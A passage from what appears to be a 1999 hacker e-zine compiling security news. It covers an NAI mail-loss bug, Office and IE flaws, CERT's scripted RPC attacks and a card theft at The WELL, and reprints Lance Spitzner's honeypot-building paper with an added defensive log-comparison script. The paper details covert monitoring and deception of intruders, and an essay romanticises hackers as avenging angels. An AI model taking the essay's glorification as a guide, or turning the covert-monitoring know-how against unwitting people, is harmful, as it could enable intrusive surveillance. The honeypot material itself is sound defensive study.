      these powers? Do we not war against the very idea of
      governments and corporations altering our brave new
      world? If we are warriors of our God, would that not make
      us Angels? 

      Thousands of years from now, our descendants may read
      their bible and understand how we all fought gallantly
      against the forces of darkness to ensure they lived in a
      world free of tyranny and oppression. They would read
      how the few battled fearlessly against the many, how we
      couldn't fathom the far-reaching consequences of our
      actions. They would marvel at how many of us were
      captured and destroyed, without even knowing why we
      had to fight. 

      So maybe we really don't need to grasp at an ethereal
      "why". It may all be pre-ordained, maybe we are just
      meant to do what we do, and it will all be revealed further
      down the long treacherous road. Then again... 

      It is possible we are all just vitamin E deficient, socially
      inept humans, with a burning desire to wreak havoc, and
      feel power and respect we aren't afforded in our daily
      lives. Perhaps it is none of these things, yet that isn't for
      me to decide. I personally like the idea of throwing down
      my gauntlet, and standing as an avenging angel beside my
      God. Ready to war against all that would seek to harm
      her. 

      Hex_Edit

      08/04/99
      
      Note: No email was provided, so no permission was sought to reprint 
            this article from HNN; normally we contact the authors. - Ed


     @HWA   
      
28.0 European Crypto Mailing List 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/ 


      contributed by LouisC 
      A new mailing list for the discussion of cryptography
      issues in the European Union has been started. You can
      subscribe by sending email to majordomo@fitug.de that
      contains the words "subscribe eucrypto" 

      JYA.com      
      http://jya.com/eucrypto.htm
      
29.0 "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?" 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      From HNN http://www.hackernews.com/ 

      contributed by Dr. Mudge 
      Weird Al's latest video "It's All About the Pentiums" from
      his latest album "Running With Scissors" should be
      available online today at 3:30 PM (EST). It will first be
      debuted on MTV's Total Request Live. "You're waxing
      Your Modem to Make it Go Faster", "You're about as
      useless as jpegs to Helen Keller", "You say your C=64 is
      really neato? What kind of chip you got in there a
      Dorito?" This album rocks. 

      Running With Scissors - via Amazon.com
      http://www.amazon.com/exec/obidos/ASIN/B00000JH89/thehackernewsnet
      
      Weird Al Yankovic
      http://www.weirdal.com
      
      It's All About the Pentiums
      http://www.thepentiums.com
      
      Note: if you haven't heard this song or don't like Weird Al for some reason you
      HAVE to listen to it, it's totally hilarious ... - Ed
      
      @HWA
      
30.0 WHO DO YOU WANT TO BE TODAY?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     by Thejian, Thursday 5th August 1999 on 8:20 pm CET
     Novell has released Digitalme, a software product that is said to allow Internet users
     to control their own online identity and make it easier, and safer, to respond to online
     user surveys. Once information is asked by a Web site, Digitalme steps in and
     provides only the facts about you you want others to know, making you as
     anonymous as you want to be. Full story below.       
     
     http://www2.idg.com.au/cwt1997.nsf/8525601d005a204e85255fdc007c1fce/ddddc180892f6fa24a2567c20021527b?OpenDocument
     

     SYDNEY  - Novell has released software it says allows Internet users to control their own online identity.

     Digitalme is designed to make it easier, and safer, to respond to the user surveys often required to 
     enter a Web site, Novell officials said. "Everyone needs to be able to manage their identity on the 
     Internet but in the past you've had to let others do it for you and you had no control over what they
     did with your information," said Novell's director of technology and education services, Glen Jobson.
     
     Digitalme takes the company's Novell Directory Services (NDS) to the Internet. Users of Novell's NetWare
     networking operating system are already familiar with the concept of an enterprise-wide directory that securely
     stores information about almost anything. Increasingly, users of Windows NT are becoming aware of directory 
     services through the anticipation being generated by Microsoft around Active Directory. And quite a number of
     NT users have also discovered NDS since it recently went cross-platform. The digitalme push is set to take 
     NDS right onto the public agenda and into the hearts and minds of everyone who has ever had to log in to 
     anything on the Internet. The concept is simple enough. You tell someone you trust, maybe your bank, perhaps
     your ISP, everything that anyone on the Net would ever be likely to ask. When a site asks you to provide that
     information, there's no need to start typing. The digitalme agent steps up to the screen and completes it for 
     you. Furthermore, the data communicated between digitalme and the Web site is encrypted and subject to an audit
     trail.
     
     Digitalme won't fill in any more information than you've told it you're happy to provide. If the site wants more
     information, digitalme will tell you what else is requested and seek your approval before handing out your 
     particulars. You can even instruct digitalme to render an anonymous version of yourself to the Web site.
     
     The digitalme information is stored in an online vault, so users are no longer stumped when they use a foreign PC
     to visit a favourite site. The first vault is being set up by Novell itself at a new site, www.digitalme.com.
     
     "We're putting everything on the site that you need, as an end user or a developer," Jobson said.
     
     You can get the client there, you can store your details in our vault, and you can download the source code and 
     APIs so that you can build your own digitalme clients.
     
     Why would someone build their own clients?
     
     The whole Internet isn't going to want Novell to be the keeper of their personal data. We expect banks, online 
     shops, finance advisers and Internet service providers, will want to manage their own vaults and encourage you 
     to keep your details with them.
     
     Why would you trust them?
     
     "This software only allows them to store your details securely. It doesn't allow them to read what's inside. 
     Only you, the owner, can see what's inside, and only you can authorise the information to be released to third
     parties," Jobson said. 
      
      (c) Copyright 1999 ComputerWorld. All rights reserved.
      
     @HWA 
     
31.0 NAI GROUPSHIELD FOR EXCHANGE BUG
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/  

     by Thejian, Thursday 5th August 1999 on 4:20 am CET
     This is a known but unannounced bug in Network Associates Inc's Groupshield for
     Exchange AV-software, causing mail messages to disappear without warning or
     trace. The problem is known to NAI and they're said to be investigating the problem.
     Full story below.      
     
     http://www.infoworld.com/cgi-bin/displayStory.pl?99084.ennai.htm 
   
     NAI Groupshield for Exchange bug causes message loss 

     By Ed Foster 
     InfoWorld Electric 
   
     Posted at 2:31 PM PT, Aug 4, 1999 
     A known but unannounced bug in Network Associates Inc.'s (NAI's) Groupshield for Exchange anti-virus product can cause messages from Exchange
     connectors to disappear. 
   
     Users who have suffered from the bug report losing thousands of mail messages without warning or trace. Messages being scanned for viruses by
     Groupshield as they come through mail connectors are inadvertently dropped before reaching the Exchange server, according to the users. 
   
     After describing the problem to NAI support engineers, users were told it is a known problem, but the company's only recommendation was that they
     disable virus scanning of all external mail connectors including those for the Internet mail, MS Mail, and cc:Mail. 
   
     "When we called NAI, they knew of the problem," reported one frustrated user. "Their recommendation is to exclude any connectors from scanning, such as
     Internet or MS Mail. There is no indication anywhere of any problems in release notes or their [Web] site, even now. Even worse, they knew that the bug
     lost data." 
   
     NAI officials contacted by InfoWorld said they could not confirm the existence of the bug, but are investigating it. They also acknowledged that earlier
     versions of the product -- before Groupshield for Exchange 4.03, released last month -- had a "message-locking feature" which under certain circumstances
     could inadvertently lock virus-free messages and prevent them from reaching the server. Such messages, however, can be recovered by the Groupshield
     administrator, they said, adding that they were unaware of circumstances in which messages would be permanently erased. 
   
     Users insisted, however, that messages are completely erased and that NAI support has confirmed that fact. 
   
     "It's not message locking; it's message disappearing," said another user who has repeatedly reproduced the problem using Groupshield with an MS Mail
     connector for Exchange. "We'd turn off their virus protection and the messages would all flow through. Turn it back on and the messages all vanish. Try it on
     another machine, and the same thing happens." 
   
     Network Associates Inc., in Santa Clara, Calif., is at www.nai.com. 
     
     
     @HWA
     
32.0 How the blackhats work  
     ~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
     
     TO BUILD A HONEYPOT
     
     by Thejian, Thursday 5th August 1999 on 3:50 am CET
     Many people asked Lance Spitzner how he was able to track black-hats in the act of
     probing for and compromising a system. Now he has written a paper discussing just that. It
     discusses how to build, implement and monitor a honeypot network designed
     specifically to learn how black-hats work. Read the paper.      
     
     
     http://www.enteract.com/~lspitz/honeypot.html - (Check here for other papers written by Lance - Ed)
       
     
     
     Lance Spitzner 
     Last Modified: 4 August, 1999 
     
     This article is a follow up to the "Know Your Enemy" series.  Many people from the Internet community asked me how I was able to track 
     black-hats in the act of probing for and compromising a system.  This paper discusses just that.  Here I describe how I built, implemented, and
     monitored a honeypot network designed specifically to learn how black-hats work. 
     
     What is a Honeypot? 
     
     For me, a honeypot is a system designed to teach  how black-hats probe for and exploit a system. By learning their tools and methods, you can then better protect
     your network and systems.  I do not use honeypots to capture the bad guy. I want to learn how they work without them knowing they are being watched.  For me, a
     well designed honeypot means the black-hat never knew he was being tracked.  There are a variety of different approaches on how you can do this.  Mine is only
     one of many. 
     
     Before I continue, I would like to post a disclaimer.  No honeypot can catch/capture all the bad guys out there.  There are too many ways to spoof/hide your
     actions.  Instead of going into detail on how this is possible, I highly recommend you check out Insertion, Evasion, and Denial of Service: Eluding Network Intrusion
     Detection or Bane software.  Also, throughout this paper I use the term black-hat.  To me, a black-hat is anyone who is attempting unauthorized access to a
     system.  This could be a 15 year old kid from Seattle, or a 45 year old company employee in accounting.  Throughout this paper our black-hat is referred to as he,
     however we have no idea what the true gender of the black-hat is. 
       
     Where to Begin? 
     
     There are a variety of different approaches to building a honeypot.  Mine was based on simplicity.  Build a standard box that I wanted to learn how the black-hat
     community was compromising.  In this case it was Linux, but you can just as easily use Solaris, NT, or any other operating system.  Don't do anything special to this
     system, build it as you would any other.  Then put the system on the Internet and wait.  Sooner or later someone will find the system and attack it.  The system is
     built to be attacked and compromised, someone will gain root on that system,  that is the goal.  However, while they are gaining root (or Admin), you are tracking
     their every move. 
     
     This approach is different from other concepts.  Network Associates has built a commercial product called CyberCop Sting.  Designed to run on NT, this product
     can emulate a variety of different systems at the same time, including Linux, Solaris, Cisco IOS, and NT.  Fred Cohen has developed the deception toolkit, which is
     a variety of tools intended to make it appear to attackers as if a system has a large number of widely known vulnerabilities.  One of my favorites is NFR's
     BackOfficer Friendly, which emulates a Back Orifice server.  All of these have their advantages.  However, my goal was to build a honeypot that mirrored my
     production systems, so I could better understand what vulnerabilities and threats existed for my production network.  Also, the fewer modifications I make to the
     honeypot, the less chance the black-hat will find something "fishy" on the box.  I do not want the black-hat to ever learn that he was on a honeypot. 
     
     The Plan 
       
     My plan was simple.  Build a box I wanted to learn about, put it on the network, and then wait.  However, there were several problems to this.  First, how do I
     track the black-hat's moves?  Second, how do I alert myself when the system is probed or compromised?  Last, how do I stop the black-hat from compromising
     other systems?  The solution to this was simple, put the honeypot on its own network behind a firewall.  This solves a variety of problems. 
       
     
       -  First, most firewalls log all traffic going through them.  This becomes the first layer of tracking the black-hat's moves.  By reviewing the firewall logs, we can begin
          to determine how black-hats probe our honeypot and what they are looking for. 
       -  Second, most firewalls have some alerting capability.  You can build simple alerts whenever someone probes your network.   Since no one should be
          connecting to your honeypot, any packets sent to it are most likely black-hats probing the system.  If there is any traffic coming FROM the honeypot out to
          the Internet, then the honeypot was most likely compromised.  For an example of how to set up alerting with Check Point FireWall-1, see the original paper. 
       -  Third, the firewall can control what traffic comes in and what traffic goes out.  In this case, the firewall lets everything from the Internet in, but only limited
          traffic out.  This way the black-hats can find, probe, and exploit our honeypot, but they cannot compromise other systems. 
     
     The goal is to have our honeypot behind a controlled system.  Most firewalls will do, as long as it can both control and log traffic going through it. 
     
     Tracking Their Moves 
       
     Now, the real trick becomes how to track their moves without them knowing it.  First, you do not want to depend on a single source of information.  Something can
     go wrong, things can be erased, etc.  I prefer to track in layers. That way, if something does go wrong, you have additional sources of information.  Also, you can
     compare different sources to paint a better picture. 
     
     Personally, I do not like to log information on the honeypot itself.  There are two reasons for this.  First, the fewer modifications you make to the honeypot, the
     better.  The more changes you make, the better the chance a black-hat will discover something is up.  The second reason is you can easily lose the information. 
     Don't forget, sooner or later the black-hat will have root on the honeypot.  Several times I have had data altered, or in one case, the entire hard drive wiped clean. 
     Our goal is to track the enemy's moves, but log all the data on a system they cannot access.  As we discussed above, our first layer of tracking is the firewall logs. 
     Besides this, I track the black-hat's moves several other ways. 
     
     A second layer I use is the system logs on the honeypot.  System logs provide valuable data, as they tell us what the kernel and user processes are doing.  However,
     the first thing a black-hat normally does is wipe the system logs and replace syslogd.  So, the challenge becomes logging syslog activity to another server, but without
     the black-hat knowing it.  I do this by first building a dedicated syslog server, normally on a different network separated by the firewall.  Then I recompile syslogd on
     the honeypot to read a different configuration file, such as /var/tmp/.conf.  This way the black-hat does not realize where the real configuration file is. This is simply
     done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want.  We then setup our new configuration file to log both locally and to the
     remote log server (example).  Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging.  Even though this
     configuration file is now useless, this will throw off the black-hat from realizing the true destination of our remote logging.  Now, you will capture all system logs up to
     and including when the system is compromised.  This will help tell us how the system was probed and compromised.  It is also very interesting comparing these true
     system logs to the logs a black-hat has "cleaned" on a compromised system.  This is the only time where I make a modification on the honeypot. 
     
     The only problem with using a remote syslog server is it can be detected with a sniffer.  Normally, black-hats either kill or replace syslogd  when they gain root.  If
     so, they can no longer sniff the syslog packets, since there are no longer any packets sent.  However, if the black-hat neither modifies nor kills the syslogd daemon,
     then they could sniff the packets sent.  For the truly devious, you could send your syslogd traffic using a different protocol, such as IPX, which is normally not
     sniffed.  Your level of paranoia may vary.  There are also several alternatives you can use to standard syslogd.  CORE-SDI has ssyslog, which implements a
     cryptographic protocol called PEO-1 that allows the remote auditing of system logs. For you NT users, they also have a Windows version, called slogger.  There is
     also syslog-ng, developed by BalaBit Software, which is similar in use to ssyslog, but uses SHA1 instead. All versions are free and open source. 
     
     My third layer of tracking (the firewall is the first, syslogd hack is the second) is to use a sniffer.  I run a sniffer on the firewall that sniffs any traffic going to or from
     the honeypot.  Since the honeypot is isolated by the firewall, you know all traffic has to go through the firewall.  The advantage of a sniffer is it picks up all
     keystrokes and screen captures, to include STDIN, STDOUT, and STDERR.  This way you see exactly what the black-hat is seeing.  Also, all the information is
     stored on the firewall, safely protected from the black-hat (I hope :). A disadvantage is the black-hat can hide his moves with encryption, such as ssh.  However, if
     you are not running any such services on your honeypot, the black-hat may not use them. Also, a sniffer can be spoofed by advanced users, as discussed by the
     paper mentioned above. 
     
     I've had great success using sniffit, a commonly used black-hat tool used to sniff passwords.  It does this by sniffing the first 300 bytes of every packet.  By
     configuring sniffit to capture the full payload of every packet, you can capture all the keystrokes in most sessions (example).  Another excellent sniffer you may want
     to consider is snort, which has additional IDS capabilities. 
       
     Finally, I run tripwire on the honeypot (there is also an NT version).  Tripwire tells us what binaries have been altered on a compromised system (such as a new
     account added to /etc/passwd or a trojaned binary).  I do this by running tripwire from a floppy, then storing the tripwire database to a floppy.  You do NOT want
     any tripwire information stored locally on the system.  By storing it on removable media, you can guarantee the integrity of the data.  As an added precaution, I
     recommend compiling tripwire as statically linked.  This way you are not using libraries that may be compromised on the honeypot.  For the truly paranoid, boot off a
     floppy (such as tomsrtbt), then run tripwire.  This protects against trojaned kernel modules.  Tripwire is an excellent way to determine if your system has been
     compromised.  Also, it is an excellent forensic tool that helps identify what modifications the black-hat has made. 
     
     You may find these layers as redundant.  But remember, no single layer of information can capture all the traffic.  Also, different sources give you different
     information.  For example, most systems cannot detect stealth scans, however, many firewalls can.  If your firewall logs your honeypot being scanned, but there is
     nothing in the system logs, then you were most likely scanned by a "stealth" scanner, such as nmap.  Also, we are not perfect.  Often while tweaking one service, you
     munge another.  You could accidentally kill system logging or the sniffer.  By having other layers of information, you still can put a picture together of what happened.
     If you develop any of your own methods of tracking, I highly recommend you implement them.  The more layers you have, the better off you are.  If you have any 
     methods you would like to recommend, I would love to hear from you.  Additional methods can include hacking the system shell or kernel to log keystrokes, but to be
     dead honest, I haven't developed the skills yet to do that. 
       
     The Sting 
       
      Remember, our goal is to learn about the black-hat, without him ever knowing he was had.  To gain a better understanding of this strategy, I highly recommend you
     watch one of my favorite movies, The Sting.  We want to attract the black-hats, monitor them, let them gain root, and then eventually kick them off the system, all
     without them getting suspicious.  To attract black-hats, I like to name my honeypot enticing names, such as ns1.example.com (name server), mail.example.com (mail
     server), or intranet.example.com (internal web server).  These are often primary targets for black-hats.  Once we have enticed them, use the methods discussed
     above to track their actions. 
     
     Once the black-hat gains root, the question becomes, now what?  Normally, I continue to monitor the black-hat for several days, to learn what he is up to. 
     However, you have to be careful, eventually the black-hat will catch on that he is on a honeypot.  If he does, bad things can happen.  What I like to do is once I
     learn everything  I can, I kick the black-hat off, normally by rebooting the box.  I do this with the shutdown command, sending a message to all logged on users (the
     black-hat), stating the system is going down for routine maintenance.  I then take the system off-line, remove the backdoors the black-hat made, and bring the
     system back online.  Or, you can reinstall, building a new system.  I recommend you fix the vulnerability that was used to gain access last time, so you can learn
     about new exploits/vulnerabilities. 
     
     The other issue is limiting the black-hat,  we do not want him launching attacks from our own system.  I do this by using the firewall.  Remember, all traffic to and
     from the honeypot must go through the firewall.  I use a rulebase that allows anything from the Internet to reach our firewall, but only limited traffic outbound
     (basically, the exact opposite of what a firewall is designed to do).  The trick is, allowing enough outbound traffic so a black-hat does not get suspicious, but we still
     have to limit their capabilities.  If you block everything outbound, the black-hat will know right away that something is up.  If you allow everything outbound, the
     black-hat can blatantly scan the Internet from your system.  You now become liable for his actions, so we have to find a balance.  Normally the first thing a black-hat
     does following  access is to download their tool set.  If they can't reach the Internet, they are going to cover their tracks and leave your system.  What has worked
     for me is to allow all traffic inbound, and allow FTP, ICMP, and DNS (UDP) outbound.  Normally, this is enough for the black-hat without them getting suspicious
     right away, but denies them utilizing most of their tools outbound.   Your mileage may vary. 
     
     That's it.  All that is left is to wait for the black-hat to strike (kind of like fishing).  Ensure you have a good alerting mechanism, so you know as soon as possible
     when your system is being probed or has been compromised.  You want to get as much information as soon as possible.  You do not want the black-hat to catch on
     before you know he is there, bad karma may be coming your way.  Good luck! 
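
     The layer comparison and the outbound rulebase described above can be checked mechanically. The following is an added example, not code from the original paper: the log layouts, addresses and the min_ports threshold are constructed assumptions, and FTP is modelled as its control channel (tcp/21) only.

```python
import re
from collections import defaultdict

HONEYPOT = "192.0.2.10"  # constructed address (documentation range)

# Constructed firewall log; the field layout is an assumption for this example.
FIREWALL_LOG = """\
Aug  3 02:14:07 fw IN  src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=21
Aug  3 02:14:07 fw IN  src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=23
Aug  3 02:14:08 fw IN  src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=25
Aug  3 02:14:08 fw IN  src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=111
Aug  3 03:40:51 fw IN  src=198.51.100.23 dst=192.0.2.10 proto=tcp dport=23
Aug  3 03:52:10 fw OUT src=192.0.2.10 dst=198.51.100.80 proto=tcp dport=21
Aug  3 03:52:30 fw OUT src=192.0.2.10 dst=198.51.100.53 proto=udp dport=53
Aug  3 03:55:02 fw OUT src=192.0.2.10 dst=203.0.113.99 proto=icmp dport=-
Aug  3 04:01:44 fw OUT src=192.0.2.10 dst=203.0.113.200 proto=tcp dport=23
Aug  3 04:01:45 fw OUT src=192.0.2.10 dst=203.0.113.201 proto=tcp dport=6667
"""

# Constructed honeypot syslog. A service only logs connections that complete
# the TCP handshake, so a half-open scan leaves nothing here.
HOST_SYSLOG = """\
Aug  3 03:40:52 honeypot in.telnetd[412]: connect from 198.51.100.23
Aug  3 03:41:15 honeypot login: LOGIN ON ttyp0 FROM 198.51.100.23
"""

FW_RE = re.compile(
    r"fw (?P<dir>IN|OUT)\s+src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"proto=(?P<proto>\w+) dport=(?P<dport>\S+)"
)
HOST_RE = re.compile(r"(?:connect from|FROM) (?P<src>\d+\.\d+\.\d+\.\d+)")

# Outbound rulebase from the text: FTP, ICMP and DNS (UDP).
# Assumption: FTP means the control channel on tcp/21.
ALLOWED_OUT = {("tcp", "21"), ("udp", "53")}


def parse_firewall(text):
    """Return one dict per firewall log line that matches the constructed layout."""
    return [m.groupdict() for m in map(FW_RE.search, text.splitlines()) if m]


def sources_in_host_log(text):
    """Source addresses the honeypot itself recorded."""
    return {m.group("src") for m in HOST_RE.finditer(text)}


def silent_probers(fw_events, host_sources, min_ports=3):
    """Sources the firewall saw hitting >= min_ports ports on the honeypot
    that never appear in the honeypot's own logs: the 'firewall saw it,
    host did not' pattern the text attributes to stealth scans."""
    ports = defaultdict(set)
    for e in fw_events:
        if e["dir"] == "IN" and e["dst"] == HONEYPOT and e["dport"].isdigit():
            ports[e["src"]].add(int(e["dport"]))
    return {
        src: sorted(p)
        for src, p in ports.items()
        if len(p) >= min_ports and src not in host_sources
    }


def outbound_violations(fw_events):
    """Flows leaving the honeypot that fall outside the FTP/ICMP/DNS rulebase.
    Each one is worth an alert: the host is being used for something else."""
    hits = []
    for e in fw_events:
        if e["dir"] != "OUT" or e["src"] != HONEYPOT:
            continue
        if e["proto"] == "icmp" or (e["proto"], e["dport"]) in ALLOWED_OUT:
            continue
        hits.append((e["dst"], e["proto"], e["dport"]))
    return hits


if __name__ == "__main__":
    events = parse_firewall(FIREWALL_LOG)
    seen = sources_in_host_log(HOST_SYSLOG)
    for src, ports in silent_probers(events, seen).items():
        print(f"probable stealth scan from {src}: ports {ports}, no host log entry")
    for dst, proto, dport in outbound_violations(events):
        print(f"outbound outside rulebase: {HONEYPOT} -> {dst} {proto}/{dport}")
```

     A source that shows up in both layers (here 198.51.100.23) made a full connection and is tracked through the host logs and sniffer instead.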
       
     
     Conclusion 
     
     Honeypots are an extremely powerful tool that allows you to learn about the black-hat community.  Correctly implemented, they give you an inside window on how
     the black-hat community works.  There are a variety of different approaches to building and implementing a honeypot, mine is only one of many.  My goal is to build
     a simple system that mirrors the production network, then sit back and wait.  The key to tracking the enemy is layers.  Do not depend on a single layer of
     information, as it can be altered or lost.  By comparing different layers of information, you can also gain a better understanding of what the black-hat was doing.
     Happy hunting :) 
       
     
     Author's bio 
     Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up
     things of a different nature. You can reach him at lance@spitzner.net . 
     
     @HWA
     


33.0 ADMINS ASLEEP ON WATCH?
     ~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 

     by Thejian, Thursday 5th August 1999 on 3:40 am CET
     "An Incident Note released by the CERT Coordination Center at Carnegie Mellon
     University suggests that crackers are using scripts to automatically probe for different
     vulnerabilities in rapid succession." Hence the term "script kiddie". Seems this
     reporter is figuring out the fact that most servers get "hacked" by utilizing known
     holes. ZDNet. 
     
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     Security administrator: Heal thyself
     By David Raikow, Sm@rt Reseller
     August 4, 1999 6:25 AM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2308725,00.html
     
     When it comes to security, system administrators like to think of themselves as defenders of the
     home-front, locked in an ongoing battle of wits with a horde of marauding invaders. But a recent
     round of attacks on UNIX servers suggests that, in reality, many administrators are asleep on
     watch. 
     
     In an Incident Note released July 22, the CERT Coordination Center at Carnegie Mellon
     University described a wave of "Similar Attacks Using Various RPC [Remote Procedure Call]
     Services." Evidence from targeted servers suggests that crackers are using scripts to automatically
     probe for different vulnerabilities in rapid succession. Any one of these security holes could permit
     the cracker root-level access to the server, completely compromising its security and threatening
     any associated machines. 
     
     While these types of alerts usually address newly discovered vulnerabilities or cracking techniques,
     this report was disturbing precisely because there was nothing new about it. 
     
     Each of the security holes attacked by the scripts is well known and documented. Each has been
     fixed by free patches available from vendors. But because many sysadmins are lax about updating
     their software, the attacks often succeed anyway. Indeed, the type of "shotgun" approach that this
     automated approach suggests is attractive only if crackers suspect that a substantial percentage of
     servers are vulnerable. 
     
     Security often takes a back seat to other priorities, as sysadmins focus on meeting the increasing
     demands placed on network systems, according to a CERT technician. Short term, immediate
     user needs tend to trump potential threats from unknown sources. 
     
     "Security is an ongoing thing, and people don't always recognize the threat," says CERT Technical
     Coordinator Quinn Peyton, "Often good administrators are hampered because they lack the
     appropriate resources." 
     
     Cracks Are Costly
     The costs of a root-level security breach can be devastating, however. According to CERT,
     compromised machines must be disconnected from the network, their drives wiped, and their OS
     software reinstalled from clean media. Any data restored from backups must be carefully
     scrutinized to prevent reintroduction of backdoors or viruses. Any and all sensitive information --
     including passwords -- also has been compromised and must be changed. Finally all associated
     machines must also be scoured for any signs of intrusion. 
     
     CERT does point out one silver lining to this cloud. 
     
     "Once people are compromised, they tend to be much more diligent," notes Peyton. "Nobody
     wants to go through that twice." 
     
     @HWA
     
34.0 THEFT HURTS THE WELL
     ~~~~~~~~~~~~~~~~~~~~
     From http://www.net-security.org/  
 
     by Thejian, Wednesday 4th August 1999 on 1:30 am CET
     A computer containing customer credit card numbers has been stolen from GST
     Whole Earth Networks' San Francisco office. Among those vulnerable for credit card
     fraud are some longstanding members of online community The WELL, although no
     fraudulent use has been reported yet or is much expected since the data was
     encrypted. Wired. 
     
     http://www.wired.com/news/news/technology/story/21076.html
     
     Computer Theft Hurts The WELL
     by Chris Gaither 
     
     12:30 p.m.  3.Aug.99.PDT
     A computer loaded with customer credit card numbers has been swiped from GST Whole Earth Networks' San Francisco office. 
     
     Among those vulnerable to credit card fraud are some longstanding members of The WELL, one of the Internet's first online communities. The WELL
     has no ISP of its own, and many members were grandfathered in to Whole Earth's WeNet service through a series of takeovers. 
     
     No fraudulent use of the cards has been reported. The information was encrypted, according to GST. 
     
     "That's great," Gail Ann Williams, executive director of The WELL, said of the encryption. "That's the ultimate defense we all dream of." 
     
     About 2,700 of The WELL's 7,000 customers use the WeNet ISP, according to Andrew Ross, vice president of marketing for Salon.com, The WELL's
     parent company. GST Telecommunications, WeNet's parent company, would not comment or answer questions about the theft Tuesday, saying
     they were too busy preparing an annual earnings announcement. 
     
     However, on Monday the company issued a release saying that credit card companies were immediately notified of the theft. 
     
     Jennifer Powell, a member of The WELL since 1993, said the bank canceled her husband's credit card as a precautionary measure. She is thankful
     that no fraud has been reported, but she said her husband must now update payment information with every service paid for with that credit card. 
     
     "It's not severe, but it's a pain," she said. 
     
     The WELL provided Internet service until 1996, when it split off its ISP division. Whole Networks then took over the division, and GST
     Telecommunications took over Whole Networks, bringing along some of The WELL's customers for the ride. 
     
     @HWA
     
35.0 MICROSOFT SECURITY FLAWS
     ~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
     
     by BHZ, Tuesday 3rd August 1999 on 7:50 pm CET
     The New York Times did an article on the ever-growing number of bugs regarding Microsoft
     Internet Explorer. The main problem comes when IE opens Word, Power Point or
     Excel documents and it assumes that the documents are safe, so it doesn't open
     any warning box. Microsoft have a solution to this problem in a little Java applet. Read
     the article here.      
     
     
          
     http://www.nytimes.com/library/tech/99/08/biztech/articles/03soft.html
     
     Software Makers Scramble to Address Security Flaw

     By SARA ROBINSON

         SAN FRANCISCO -- Three giants of the computer industry --
          Microsoft, Hewlett-Packard and Compaq Computer -- found
     themselves scrambling on Tuesday to address a rash of serious security
     vulnerabilities in software designed to interact with Microsoft's Internet
     Explorer Web browser. 

     The flaws, first made public last week, are
     particularly insidious because they allow
     intruders to plant malicious programs on a
     computer merely by sending an e-mail message
     or by luring a victim to a malicious Web page
     that automatically plants a file on the visitor's
     hard drive. 

     In either case, the victim would receive no
     warning of a potential security violation because
     the flaws enable intruders to bypass the security
     controls of Internet Explorer and pass
     undetected through traps set by antivirus
     software. 

     Tom Noonan, president of Internet Security Systems in Atlanta, said on
     Tuesday that several of his client corporations had expressed concern
     that "now that this information is in the wild, their systems are exposed." 

     "They worry that they are building their network on top of a vulnerable
     system," he said. 

     Unlike the Melissa virus or the Explore.exe worm, programs that exploit
     these newly discovered security bugs do not require that the victim take
     any action; rather, such programs can be activated if a user merely reads
     a malicious piece of e-mail while online. 

     As of this evening, there had been no reports of intruders having
     exploited the flaws, but Microsoft announced that the problems had
     prompted plans for a major change in the security design of its Windows
     operating system and the Internet Explorer browser that it recently
     integrated into Windows. 

     Currently, if Internet Explorer encounters on-line documents created by
     one of the Microsoft Office suite of programs -- Word, Excel or
     Powerpoint -- it assumes that they are "safe" and loads them on the
     user's computer without warning. 

     The problem is that these are very powerful documents capable of
     launching executable code, whether benign or malicious. Microsoft said
     future operating systems would not trust such documents. 

     Andrew Dixon, the Microsoft Office product manager, said the company
     was developing an applet, or small Java program, that would issue a
     warning before opening Office documents. 

     The immediate problem with Office is that Word or Excel documents can
     relay an arbitrary command to a computer through a flawed data-base
     component that shipped with all but the last boxes of Office 97. 

     The Office team worked over the weekend to develop and test a solution
     to this, Dixon said. But by this evening they still did not feel confident
     enough to release a patch for the problem to the 50 million registered
     users of Office 97. When a patch is available, he said, it will be posted
     on the Web at http://officeupdate.microsoft.com/Articles/MDACtyp.htm.

     In addition to the Office flaws, security holes were found last week in
     software shipped with Hewlett-Packard's Pavilion models and Compaq's
     Presarios. Both models were designed to offer customers remote support
     via the Internet, using Microsoft's browser. Both computer makers
     configured the browser to allow powerful little programs to run without
     warning the user. 

     Unfortunately, these applets have the ability to run any other programs. 

     Hewlett-Packard planned to have a patch available soon, said a
     company spokesman, Ray Aldrich. He said the fix would be posted on
     the Web at http://www.hp.com/support/hppavilion.html. 

     "We believe this problem is serious and should be immediately
     addressed," Aldrich said. 

     "We do so much testing but sometimes we miss stuff." 

     Hedy Baker, the public relations manager for Compaq's consumer
     product division, said the company planned to issue an advisory on
     Wednesday to Compaq support centers and expected to send out a
     software update to owners of the affected Presarios by the end of next
     week. 
     
     @HWA
     
36.0 CHINESE CYBER WARRIORS
     ~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 

     by BHZ, Tuesday 3rd August 1999 on 7:39 pm CET
     After NATO strikes on Yugoslavia, when China's embassy was accidentally hit, cyber
     war between American and Chinese hackers started. Chinese military wants to train,
     as they say "professional cyber warriors" to be ready for on-line battle. More on the
     topic from managing editor of asia.internet.com here.      
     
     
     From asia.internet.com

     Chinese Military Seeks to Train Cyber Warriors 
     August 3, 1999
     By Hans Lombardo
     Managing Editor, asia.internet.com 


     [Hong Kong, CHINA] The Chinese military hopes to develop the capability of engaging in warfare over the Internet by training
     hackers to take the battle online. 

